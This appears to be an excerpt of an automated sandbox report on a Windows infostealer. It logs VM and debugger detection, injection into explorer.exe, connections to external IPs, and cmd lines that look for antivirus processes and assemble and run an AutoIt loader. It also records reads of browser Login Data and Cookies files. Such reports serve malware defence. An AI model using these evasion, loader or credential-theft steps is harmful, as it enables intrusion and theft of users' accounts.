      Source: explorer.exe, 00000002.00000000.2165593335.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4121441203.000000000172B000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000002.4561053585.00000000038B5000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4109189873.000000000172B000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4129845181.000000000172B000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4164491400.000000000172A000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4108302557.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: tmp1721021440_3.19.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
      Source: Later.pif, 00000013.00000003.3986742882.000000000167C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW]
      Source: Later.pif, 00000013.00000002.4560271483.0000000001668000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllVEWFWOOOGJ
      Source: tmp1721021440_3.19.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
      Source: Later.pif, 00000013.00000003.3986742882.00000000016BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllocal\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows
      Source: Later.pif, 00000013.00000003.3971647939.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.3971430000.0000000001689000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWb
      Source: Later.pif, 00000013.00000003.4092186003.00000000016CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllWindows.
      Source: explorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
      Source: tmp1721021440_3.19.drBinary or memory string: AMC password management pageVMware20,11696428655
      Source: explorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
      Source: tmp1721021440_3.19.drBinary or memory string: tasks.office.comVMware20,11696428655o
      Source: explorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
      Source: tmp1721021440_3.19.drBinary or memory string: interactivebrokers.comVMware20,11696428655
      Source: tmp1721021440_3.19.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
      Source: tmp1721021440_3.19.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
      Source: explorer.exe, 00000002.00000000.2163432174.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
      Source: tmp1721021440_3.19.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
      Source: explorer.exe, 00000002.00000000.2162269436.0000000003554000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
      Source: tmp1721021440_3.19.drBinary or memory string: bankofamerica.comVMware20,11696428655x
      Source: explorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
      Source: explorer.exe, 00000002.00000000.2165593335.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000002.00000000.2163432174.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: tmp1721021440_3.19.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
      Source: Later.pif, 00000013.00000003.4155490022.00000000016BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNOT NULL PRIMARY KEY, relying_party_id VARCHAR NOT NULL, label VARCHAR NOT NULL, icon BLOB NOT NULL, date_created INTEGER NOT NULL DEFAULT 0, user_id BLOB)k+
      Source: explorer.exe, 00000002.00000000.2163432174.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
      Source: tmp1721021440_3.19.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
      Source: explorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000002.00000000.2162269436.0000000003554000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
      Source: tmp1721021440_3.19.drBinary or memory string: discord.comVMware20,11696428655f
      Source: tmp1721021440_3.19.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
      Source: tmp1721021440_3.19.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
      Source: tmp1721021440_3.19.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
      Source: Later.pif, 00000013.00000003.4107631210.00000000016CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,,yPH(i
      Source: tmp1721021440_3.19.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
      Source: tmp1721021440_3.19.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
      Source: tmp1721021440_3.19.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
      Source: tmp1721021440_3.19.drBinary or memory string: outlook.office365.comVMware20,11696428655t
      Source: tmp1721021440_3.19.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
      Source: Later.pif, 00000013.00000002.4560271483.0000000001668000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4165412767.000000000167E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: tmp1721021440_3.19.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
      Source: tmp1721021440_3.19.drBinary or memory string: outlook.office.comVMware20,11696428655s
      Source: tmp1721021440_3.19.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
      Source: tmp1721021440_3.19.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
      Source: explorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: tmp1721021440_3.19.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
      Source: explorer.exe, 00000002.00000000.2162269436.0000000003554000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
      Source: tmp1721021440_3.19.drBinary or memory string: dev.azure.comVMware20,11696428655j
      Source: tmp1721021440_3.19.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
      Source: explorer.exe, 00000002.00000000.2162269436.0000000003554000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
      Source: explorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
      Source: Later.pif, 00000013.00000003.4113726100.000000000167E000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4077208565.0000000001697000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4130104259.0000000001690000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4035066859.000000000167D000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4077591784.00000000016A3000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4165412767.0000000001690000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4146934684.0000000001690000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4034709482.000000000167C000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000002.4560271483.0000000001668000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4155490022.0000000001690000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000003.4038890020.00000000016A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V ,
      Source: tmp1721021440_3.19.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
      Source: explorer.exe, 00000002.00000000.2159497737.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\wjshsfaSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\wjshsfaProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C643B9 BlockInput,19_2_00C643B9
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C18DB9 _memset,IsDebuggerPresent,19_2_00C18DB9
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C25BDC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,19_2_00C25BDC
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeCode function: 7_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,7_2_004062FC
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021D092B mov eax, dword ptr fs:[00000030h]0_2_021D092B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021D0D90 mov eax, dword ptr fs:[00000030h]0_2_021D0D90
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_022A1979 push dword ptr fs:[00000030h]0_2_022A1979
      Source: C:\Users\user\AppData\Roaming\wjshsfaCode function: 4_2_02151AA9 push dword ptr fs:[00000030h]4_2_02151AA9
      Source: C:\Users\user\AppData\Roaming\wjshsfaCode function: 4_2_0224092B mov eax, dword ptr fs:[00000030h]4_2_0224092B
      Source: C:\Users\user\AppData\Roaming\wjshsfaCode function: 4_2_02240D90 mov eax, dword ptr fs:[00000030h]4_2_02240D90
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C486B0 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,19_2_00C486B0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C1A284 SetUnhandledExceptionFilter,19_2_00C1A284
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C1A2B5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00C1A2B5
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014E4DD4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_014E4DD4
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014D8F1E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_014D8F1E
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014D95AC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_014D95AC

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\explorer.exeFile created: 9CFE.exe.2.drJump to dropped file
      Source: C:\Windows\explorer.exeNetwork Connect: 77.221.157.163 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 58.151.148.90 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 127.0.0.127 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 186.101.193.110 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.149.100.242 443Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 12119D0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\wjshsfaThread created: unknown EIP: 30419D0Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifMemory written: C:\Users\user\AppData\Local\Temp\78801\Later.pif base: 1400000 value starts with: 4D5AJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\wjshsfaSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\wjshsfaSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C4914C LogonUserW,19_2_00C4914C
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C05240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,19_2_00C05240
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C51932 SendInput,keybd_event,19_2_00C51932
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C550A7 mouse_event,19_2_00C550A7
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Beastiality Beastiality.cmd & Beastiality.cmd & exitJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 78801Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "rapidconfidentialityspokedrill" Thanks Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Thanksgiving + Arnold + Daily + Mobiles + Drugs + Log + Shoes + Bd + Representations + Investment + Explore + Submissions + Bosnia + Closing + Supervisors 78801\BJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\78801\Later.pif 78801\Later.pif 78801\BJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifProcess created: C:\Users\user\AppData\Local\Temp\78801\Later.pif C:\Users\user\AppData\Local\Temp\78801\Later.pifJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C486B0 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,19_2_00C486B0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C54D89 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,19_2_00C54D89
      Source: Later.pif, 00000011.00000000.2887708150.0000000000CA5000.00000002.00000001.01000000.00000007.sdmp, Later.pif, 00000013.00000000.3862943026.0000000000CA5000.00000002.00000001.01000000.00000007.sdmp, Later.pif.8.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: explorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
      Source: explorer.exe, 00000002.00000000.2161546840.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000002.00000000.2163256982.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2161546840.0000000001731000.00000002.00000001.00040000.00000000.sdmp, Later.pifBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000002.00000000.2161546840.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: 9CFE.exe, 00000007.00000003.2827915033.0000000002841000.00000004.00000020.00020000.00000000.sdmp, Festivals.7.drBinary or memory string: cript files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: explorer.exe, 00000002.00000000.2161546840.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000002.00000000.2159497737.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C1878B cpuid 19_2_00C1878B
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW,19_2_014D83FF
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: RegGetValueW,RegCloseKey,RegEnumKeyW,GetKeyboardLayout,GetLocaleInfoW,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,19_2_01418689
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: RegEnumKeyW,GetKeyboardLayout,GetLocaleInfoW,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,AllocateAndInitializeSid,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,19_2_01418940
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: EnumSystemLocalesW,19_2_014EC27C
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: GetLocaleInfoW,19_2_014EC83F
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,19_2_014F4DA9
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: EnumSystemLocalesW,19_2_014F513B
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,19_2_014F51C6
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: EnumSystemLocalesW,19_2_014F5055
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: EnumSystemLocalesW,19_2_014F50A0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,19_2_014F5542
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: GetLocaleInfoW,19_2_014F5419
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,19_2_014F571E
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: GetLocaleInfoW,19_2_014F5648
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifQueries volume information: C:\Users\user\Desktop\FACWLRWHGG.docx VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifQueries volume information: C:\Users\user\Desktop\MQAWXUYAIK.docx VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifQueries volume information: C:\Users\user\Desktop\XQACHMZIHU.docx VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifQueries volume information: C:\Users\user\Documents\XQACHMZIHU.docx VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C5E0CA GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,19_2_00C5E0CA
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C30652 GetUserNameW,19_2_00C30652
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C2409A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,19_2_00C2409A
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeCode function: 7_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,7_2_00406805
      Source: Later.pif, 00000013.00000003.3986742882.000000000167C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: V%ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: Later.pif, 00000013.00000003.3986742882.000000000167C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : Select * From AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000000.00000002.2183305137.0000000003C21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2182890350.0000000002230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2417255562.0000000003FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2417195309.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: \Google\Chrome\User Data\Default\Login Data19_2_01401250
      Source: global trafficTCP traffic: 192.168.2.5:49743 -> 46.246.96.149:80
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: Later.pifBinary or memory string: WIN_81
      Source: Later.pifBinary or memory string: WIN_XP
      Source: Later.pifBinary or memory string: WIN_XPe
      Source: Later.pif.8.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyteP
      Source: Later.pifBinary or memory string: WIN_VISTA
      Source: Later.pifBinary or memory string: WIN_7
      Source: Later.pifBinary or memory string: WIN_8

      Remote Access Functionality

      barindex
